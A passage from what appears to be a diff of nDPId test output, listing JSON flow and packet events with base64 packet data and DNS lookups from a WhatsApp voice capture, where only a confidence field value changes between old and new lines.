{"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455687991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455687991,"pkt":"xiwDYGpkkLkxKPrKCABFAAA89ksAAP8RQAfAqAIMwKgCAe1dADUAKOSmDHcBAAABAAAAAAAAAWcId2hhdHNhcHADbmV0AAABAAE="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455688018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1561455688018,"pkt":"kLkxKPrKxiwDYGpkCABFAABj38gAAEARFWTAqAIBwKgCDAA17V0ATz5mDHeBgAABAAIAAAAAAWcId2hhdHNhcHADbmV0AAABAAHADAAFAAEAAArzAAsEY2hhdANjZG7ADsAsAAEAAQAAAEEABJ3wFDU="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": 
{"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"157.240.20.53"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688201,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDyQZ7pIeMIAQCAC0bwAAAQEICjTN8KY8skLCFwMDD+Ai5NOSopi\/6GqwlD\/tAZzY1QGzvljqTGTmGCJOrU3x8CYKomrYaziO5eZ4ouY8cCYpOJvKrDNJX33pdge2bBxjgZp3ciHlbT9gHcPpJV3HIK5K4Xwsy7N\/d9l3pDdGz5PHrVVzZeXakf14DKR+hXrIhRVy6hpv5t2VthQzM3sKU7KhJpL\/6a5Sp489WK3Z7dzYFK2J+ermhE1b03GDPIEb7MGTpTJQaqangZgy8gro1eaetAilk1o529zodA1M9O5BVqL2oF301LG+kaqQTY1SPLvOnn1MxBlBEbzmsfvPr0H7C5Xcv51kP+cMU9R39VU1KEVp3e+2GMmIXWxgb+NKRMo4d5o6BKoHJ36YKQ33eAmIMAcZsFkdzfDz5q2jCxngiuQsbQKoYL1rQHGV7CXWI3zE9edQrQPJaGQZaxu\/+b+1vqSWxtCMEOUMVSmhM+FpUOqnKqwXsN4BgvySE1+U34RH0SV6FPoBjF0WGfVjkUid\/lVZcbedi\/PfkG0yBpT2\/Is9EIUqT+5Azj96UOFZqIEtSsIYSrk7ySkvjrKz5bHkeMLQk1mxQwJByZOSa30oY5bmNGAgD00g7CKAigVgWl6pq33BURhk4PDRhLJn426pN8ndnOOPzVylhr5g1C978hT8qaiuW1hlXdPnoMeCp9hEy7A5ziIjQi\/j6SVmDBSjwtJ0oqoQ\/ul2VzP1hHUGnZiTl\/qoxKKUfFrrwqTto6BvQjrKNa8bmHfrJg1RkCF3YK1iU3RCTPB\/4c68wZU3wRZ8hH1dNOLSgkwNQHFvEa\/gv\/qOxZkCS+Hpja9b5OtYooCqZnURTItdIoosw\/pte6KHG8eCIx\/U7yLLCmLs4D6MQwGZZ2yJ9zt9zcZXv1g03W4UohfquGy0ioHzSnw\/O3jNSfyTyrsrgxGqBD7B02ehphvU7Ax3IIziLDpWGnOBTyjYVNl423Z+0c9qK5fdUeybRNKKbWmwJqAFyKo3Mn2oSjBse+IbmEyy74UtCrn7MO79P00k7ZwAdz4X9zs28aMTKpnGFfXXxKMpT0Dd5ofiYXaTFr2Jwybi92XLCleA2OWxMIUro0rxoo67fYKdVxbqwQCMyEw6LTznHMXWYOpkkn6VHuawZe8M1HJsON5lEoItuqd\/IBfWUMshGlV8OgIAoc3EW3VlOFAiqg0pqVqjmyE8T8wQAvejRCf2f7iThtrzSrjIJDgibkW3Ecp3KoIC1KVlhjp4HLMvTgc12F13bDzcsr4rYSNpgOus\/4N4UzMrQyfYM2uNlqx0HfPLs50MVn\/Kyef0KdSuCHGqHLEJ+g1+EB9i2mop53wwymGotu9IoWgU02wrdRtoavOIQ5TMaPT9Jy+tmpyw9rSZn4YhMfxR72sCFIVM2eQlDOP2kti8y02qh8vwstuWp8ER3\/PKo9BgChhkuUmF5Df6lKXn1exWi67C9f1S5pc1iv33gDt3T0VcEHwoxmIh6MLrQ4LDUY7JX7mEuRfro3sR\/Ir2u
fPPOhOBqsPV5YskVY9tWAevz7WMRn8EtRyvVaVHL3wxu1gErJNgcQ\/Af9fGR5KHI8lfrzLWY+bV9Q6PY8piE9FU2r7QV9Q5YgbBE6yKjPA3fOpiBOv+IVCsLXJNVdRvAywibpuoJAy2z01Fc5o3x+ZW2eqdFSSyuDepi7EBv4YJnAtmqjCVimRnoZ68Pz\/ocEFw5tBKkvU5uadJKwflJJ0hJUUOKwAQFCWvvApj3f356wTvDmU788W1R\/Vmzin60ZrsL16uD4sDmXGOueQVWddIzbIT0jyuT6IK9gJjCyELuMZhwwjNJ\/gEh8+\/PwFaVXbn\/1dsvjpj0IhPwCusRttL60194v983ySgSQpQrf9f+n\/rJIRYwpsq4DBRu9SydD72zD93mD4idl3s3tsUHh6rp5k7Bf4L"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688201,"flow_last_seen":1561455688201,"flow_idle_time":7580000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1561455688201,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455688202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgXUAABAAEAGJCjAqAIMEfI8VMDKFGdIDym57pIeMIAQCADYpQAAAQEICjTN8KY8skLCFtVfgrozcBhAJsfsFvLQO\/UNbKaPAKskPEHc2H7HNZvZ0KHfZ\/KP+B9OyPm0SdMSjavTXp1RBX4n8dtnNy7ldwySyG0XJJWeRoZiiRtgXrZdFFD0QAS3Pe1DBo\/FUctyy9XBKqwrw5v92Jj5UtBctOxUvfejQ1SPTAJ5IukXOUTVRhF+GJ6uJpn2Gyv2J\/hXj4mZyNeIliL2I7bOA3ury1GpGWko+MWMnPSKdWfc+5iZ8htj49VB2VDsL+uaCsidGqZX708pkKajJgAtzAX6+OwUhPXab61vOJn2ZVsE84On3Sc1Kl0WWtXgaA5Kty9ym4wLqQYEYP55F5oeJX4cTBOZRUcxhyM2DEPfiJE4aGH7aPKJO1JXXtoaeR6aRsid5OY044cRXoCwjbqa8kVLoyG\/1hSUaMwK17Rm6Nq+PbrF+ED8fmHgN\/1Dutcz+R4xma\/dfBoQDryBVCTEwOthrl7LLjRmNDBA\/nKPrgUx1pUPyir\/k\/cBNu5VmA9ROEDXJTcYsaqkjSroNougihkTVcfxMwA0V1eozYWnylZYZfyg3u53u+M+Do2uu\/vpHb6ZX\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\/uwztG9gvPjPu8PKqPu7OCXZj1ZBnnEX2PjjdGe8\/qo\/GKpAlJAuol7xe33zGz401h7+ux36y894Mbarjx1CDQxx9YqwY6Lr4EHSyCq\/xOaCM9Ig4AmEcFYjNP6niCHmI6fO24v\/GQB6WXdzSw2ClyCXHYbvr4Qqi+4qXoeh2xXDeKjcBBfLtEOni++s2q3gzhbAvkZLj\/NmeA2TXw0Z3iDbzj8\/Y4RPkg+eKwZkIo3UDfKsFnJdpryN60+cHgLr\/4b6yqkGde7QP698bVNcwUBDmhcPTGUF72BSrLQvrtwQZtWbAZrNkztpBLnQ0QkqUG4rCER6dvRqYMKv5dFfseMTa1Q1gUuqPbbz23yUKTRtop\/\/Lht4EEFlQYsfbz48ddhpIGiMg5mZbcRDG3SabEXgtzSNVHYYfQC6vW4pikjByoIlKAdhA6SR3Oh3PU52UQkf1H00x5\/\/1hV8lcpLckyN2LNUVFAYrwz5do38QxPssBrJ+3S6\/aEGPegc3B67mnX5V9KdAWJTKT9mA6BOcYDIvqCcaofS9sLdAjWNazl\/6YRqmsk\/JZn6nsHta+t4co6kKrh8ZoenAhtwbNaOVmExbItteeviDeqFUd2pkhp3kXIT8d6YMdXIloWHR8vT7oGOwNL5sNWFZXjAeqyXFLohZVoKLbw4szdHzrmDOl0IHwY6y6lYvTSYc6OyNhkaHXFSCKUjvAFZPuWmliraxAT7phw5quixNUJhdRcYng0LMN9J3KAyHFA8Ber5WNyIqMxWZ5wh4eVaY0B\/wQ"} 
02080{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455688202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1255,"pkt_l4_len":1221,"thread_ts_msec":1561455688202,"pkt":"xiwDYGpkkLkxKPrKCABFAgTZAABAAEAGJSPAqAIMEfI8VMDKFGdIDy9Z7pIeMIAYCACWYAAAAQEICjTN8KY8skLChD9+sl9zTIn+9oKwtdTi9Vdi\/cqtS9SsuLktLexhq+H6HSh0nUz\/pR7lGjfA8jUSbTLAiEYeFmvZtDgZTjhibXwhbTyW2ej1slX5wS0YUeKb381u+fexhn3xRkOOgFD2lHUCDNs6ZDxZ3MgjWXZ\/6y+5+G4Cr5MmO9LbbXgHM2tCoGf6bFpAilIbDNDjf72PZn2d6eJMciO25CCni3NwF1VQe25Bd9JCM8RNSipKwwpntSqY6SidwnIyNKgMjNfj+GMhuOpcSsAcRSjT\/L\/y6Nc7rkRDfvgoZpO7IrcZRsLerm0SSzH8usyI2xA+WCvEPlDoV\/87+olgpceCoKG1cf6TrD9aD7Lh7Yzi2mRYXX50kN9XYC9UhK+eEqcUiK0EA6ia38NkceSip2pBuv85\/091UH5OzSLrTUOJg+XVoE7ssGb7XKiRE+FOZu+zmhmuXn2Ujg8u76JsqT+uY0KkCyvwkXLeCV2kPGxz31MiSwGtNtz1oNvEGHur+FQDs\/zPpy1TfX803cqFKkblAu9BFTe4MXIK6IqhxFJcK3dj\/d8o2Zlvxu2S2NA3FH3zT7CWqacXhL+wQyS+\/DALOFfsZZCyD97Lwmcig1rgISji1T9qsBO4dRFWt5bVa2GoIozmHRLhPE\/xUBXrVvCjMLlRXbBby9l3tFLBkeNarajglfyHMtazotsPWceBe13wiPjaSciJqd486cT5nmripbb2TNv6m2QS+yBxolanBtMMlalvyClJnjFYXmEMA\/Cqafcjah0LpamWi5cGxlhK2o7VpcXk60WiDqklprDwU1C6AQQ3t9+In381BWOH2ylFLvtkYQS6mza73M7ORMV9T+VX4ja00u4BItehp2lgwr5wZ9hQu6lejNiwFYLaMPe7D\/bAwWtcZeYT8kAUL9H2S1idX7efThRI\/sFUnhFydcfZzFx9yoqvQ\/XNBIf8hR2ZwEmxUM7nHYq2mZ+\/B91bETK14kZx6AmSi1jqJABWenJppvp4cXzcY1BWUqJk0PLYkAexhw7t652If5IzcojeSdWFP2lhdau7nHX6G7lW4Utg7ZWXLyccWSWSv6ha+LeiDlED1cCwY2vVHkPEKRqluaQYKLl2qvR1wE3m0usuIl4q2MEc3z7A5MGmXicgQHspwoVe96OedZ9UbKdxn5F5OBTgOA+JY4EBKs3\/51SigijtnbNr7w00IZM1a32DUVsHDNnCKoJQHhPhULTSuboR4FgTKv5jA8DkAaFXzOTQQMYjx7YZD+FVCVnmqRcXzRQCUejaACj05EFq7vsiXpx9kEWnOGLDfJ22A0AjBRXoBK9EYB2xjWa+gzWXLgtnfTfAdhzT3lkAyklF\/qQA0sttDRgDxUQ4slW4E3BzVFH0h4GehIXJZzWEseP9XQr0J1UhTOB7Dv78mCeQyIVzY5PpIKGqL37IUaJV6gk4viji4bM8JRt522Xsc3xIrKuiMjhRRmYQYZR2\/fsuI+jWL\/oLRyVbeQmMYbj2qIY8qMy
xD0\/HUbbJCm1sWV3U2RsK1wnhcO2gFFVKyPqfKwE0xDwAtsxVH6ZCeakAFNP5dRNlfhay6WJ8owHDTw=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455688445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455688445,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI7iMAAEARBjHAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688445,"flow_last_seen":1561455688445,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455688445,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455688704,"flow_last_seen":1561455689011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1561455689011,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455688704,"flow_last_seen":1561455689011,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1561455689011,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455689728,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1561455689728,"pkt":"xiwDYGpkkLkxKPrKCABFAABL058AAP8RYqTAqAIMwKgCAdgAADUAN5FDM2kBAAABAAAAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAE="} 
-00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455689761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1561455689761,"pkt":"kLkxKPrKxiwDYGpkCABFAABbphoAAEARTxrAqAIBwKgCDAA12AAAR3hsM2mBgAABAAEAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAHADAABAAEAAABFAAQfDVYz"} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}} 